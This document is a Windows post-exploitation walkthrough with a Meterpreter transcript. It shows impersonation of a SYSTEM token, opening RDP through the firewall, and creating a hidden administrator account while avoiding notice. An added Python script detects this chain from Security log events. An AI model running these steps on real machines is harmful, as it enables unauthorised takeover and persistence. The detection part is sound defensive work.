Post-exploitation steps after obtaining a Meterpreter session on Windows
| Purpose | Command |
|---|---|
| Check which user the session runs as | getuid |
| If it is a low-privilege account, load the token-manipulation extension first | use incognito |
| List the tokens available to the process, grouped by user | list_tokens -u |
| Once a high-privilege token is listed, impersonate it (if the backslash is swallowed by the console, write it as `\\`) | impersonate_token "NT AUTHORITY\SYSTEM" |
| Garbled (mojibake) output in the shell: switch the console to UTF-8 | chcp 65001 |
| Basic host enumeration | systeminfo |
| Firewall rule allowing inbound TCP 3389, for when RDP is not reachable. `netsh firewall` is deprecated; current builds accept it but point to the `netsh advfirewall firewall` syntax | netsh firewall add portopening protocol = TCP port = 3389 name = rdp |
| Add a "hidden" user. The trailing `$` only hides the account from `net user` output; it is still visible in Local Users and Groups, in the SAM and in the 4720 account-creation event | net user attacker$ 123456 /add |
| Add that user to the local Administrators group | net localgroup Administrators attacker$ /add |
| Check who is logged on before connecting over RDP: on a workstation a new RDP logon disconnects the console session and would tip off the administrator | quser |
```
meterpreter > getuid                       ## current user: an ordinary local account
Server username: SIMONF0CB\simon
meterpreter > use incognito                ## load the token-manipulation extension
Loading extension incognito...Success.
meterpreter > list_tokens -u               ## list available tokens by user
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
NT AUTHORITY\SYSTEM
SIMONF0CB\simon
Impersonation Tokens Available
========================================
No tokens available
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"   ## impersonate the SYSTEM delegation token (escape the backslash as \\ if the console strips it)
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid                       ## the session now runs as SYSTEM. Had the token only been a local administrator, getsystem would escalate the rest of the way
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 4980 created.
Channel 5 created.
Microsoft Windows [版本 10.0.18363.592]
(c) 2019 Microsoft Corporation。保留所有权利。   ## ("Version ... All rights reserved.") Both lines arrive as mojibake: cmd.exe prints its banner in the OEM code page (936 on Chinese Windows) while msfconsole decodes the channel as UTF-8
C:\Windows\system32>chcp 65001             ## switch the console to UTF-8; the garbling stops
chcp 65001
Active code page: 65001
C:\Windows\system32>systeminfo             ## basic host enumeration
systeminfo
Host Name: SIMONF0CB
OS Name: Microsoft Windows 10 专业工作站版   ## (Windows 10 Pro for Workstations)
OS Version: 10.0.18363 N/A Build 18363
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: simon
C:\Windows\system32>netsh firewall add portopening protocol = TCP port = 3389 name = rdp   ## allow inbound 3389 when RDP on the target cannot be reached
netsh firewall add portopening protocol = TCP port = 3389 name = rdp
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
Ok.
C:\Windows\system32>net user attacker$ 123456 /add   ## "hidden" user: the $ suffix only hides it from net user; it is still in the SAM, in Local Users and Groups and in the 4720 event
C:\Windows\system32>net localgroup Administrators attacker$ /add   ## add the account just created to the local Administrators group
C:\Windows\system32>quser                  ## check who is logged on first: an RDP logon to a workstation disconnects the console user and would alert the administrator
```
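The sequence above (create a `$`-suffixed local account, add it to Administrators, open 3389 with netsh) leaves a recognisable trail in the Windows Security log. The following detection logic is an added example, not part of the original page: it runs the three checks over constructed Security event records (4720 account created, 4732 member added to a local group, 4688 process created) and correlates them per host within a time window. The records are constructed for the example; field names follow the real event schemas, but `MemberName` is assumed to be resolved to an account name rather than a SID, and the 4688 check assumes "Include command line in process creation events" is enabled.

```python
"""Detect the hidden-admin + RDP-opening chain in Windows Security events.

Added example: the event records below are constructed, not real logs."""
import re
from datetime import datetime, timedelta

# Constructed sample records shaped like Security log events.
# Assumption: MemberName in 4732 is already resolved to DOMAIN\name.
SAMPLE_EVENTS = [
    {"time": "2020-03-01T10:00:05", "id": 4720, "host": "SIMONF0CB",
     "data": {"SubjectUserName": "SYSTEM", "TargetUserName": "attacker$"}},
    {"time": "2020-03-01T10:00:09", "id": 4732, "host": "SIMONF0CB",
     "data": {"SubjectUserName": "SYSTEM", "TargetUserName": "Administrators",
              "MemberName": "SIMONF0CB\\attacker$"}},
    {"time": "2020-03-01T10:00:20", "id": 4688, "host": "SIMONF0CB",
     "data": {"SubjectUserName": "SYSTEM",
              "NewProcessName": "C:\\Windows\\System32\\netsh.exe",
              "CommandLine": "netsh firewall add portopening protocol = TCP port = 3389 name = rdp"}},
    # Benign noise on another host: helpdesk creates a normal account.
    {"time": "2020-03-01T11:30:00", "id": 4720, "host": "FILESRV01",
     "data": {"SubjectUserName": "helpdesk", "TargetUserName": "jdoe"}},
    {"time": "2020-03-01T11:30:04", "id": 4732, "host": "FILESRV01",
     "data": {"SubjectUserName": "helpdesk", "TargetUserName": "Remote Desktop Users",
              "MemberName": "FILESRV01\\jdoe"}},
]

# Matches both the legacy "netsh firewall" and "netsh advfirewall firewall"
# forms as long as port 3389 appears in the command line.
NETSH_3389 = re.compile(r"netsh(\.exe)?\s+(firewall|advfirewall)\b.*\b3389\b", re.IGNORECASE)


def _ts(event):
    return datetime.fromisoformat(event["time"])


def hidden_accounts(events):
    """4720 (user account created) for a name ending in '$'. Real computer
    accounts are logged as 4741, so a 4720 with the machine suffix is the
    'hidden user' trick rather than a legitimate machine join."""
    return [e for e in events
            if e["id"] == 4720 and e["data"]["TargetUserName"].endswith("$")]


def admin_group_adds(events):
    """4732 where the target group is the local Administrators group.
    In 4732, TargetUserName is the group name and MemberName the new member."""
    return [e for e in events
            if e["id"] == 4732 and e["data"]["TargetUserName"].lower() == "administrators"]


def rdp_firewall_openings(events):
    """4688 process creation whose command line is a netsh rule for 3389.
    Requires command-line auditing, otherwise CommandLine is absent."""
    return [e for e in events
            if e["id"] == 4688 and NETSH_3389.search(e["data"].get("CommandLine", ""))]


def correlate(events, window_seconds=600):
    """Chain the three stages on the same host within `window_seconds` of the
    account creation. Returns one alert per (host, account) with all stages."""
    window = timedelta(seconds=window_seconds)
    adds = admin_group_adds(events)
    opens = rdp_firewall_openings(events)
    alerts = []
    for created in hidden_accounts(events):
        acct, host, t0 = created["data"]["TargetUserName"], created["host"], _ts(created)

        def in_window(e):
            return e["host"] == host and t0 <= _ts(e) <= t0 + window

        member_match = [a for a in adds if in_window(a)
                        and a["data"]["MemberName"].split("\\")[-1].lower() == acct.lower()]
        fw_match = [o for o in opens if in_window(o)]
        if member_match and fw_match:
            alerts.append({"host": host, "account": acct,
                           "created_by": created["data"]["SubjectUserName"],
                           "stages": ["4720 hidden account", "4732 Administrators",
                                      "4688 netsh 3389"]})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Each stage is also useful alone: a 4720 for a `$`-suffixed user is suspicious on its own, since legitimate machine accounts never arrive as 4720. The correlation just raises confidence and ties the three events to one host and account; tighten or loosen `window_seconds` to taste, and drop the 4688 stage on estates without command-line auditing.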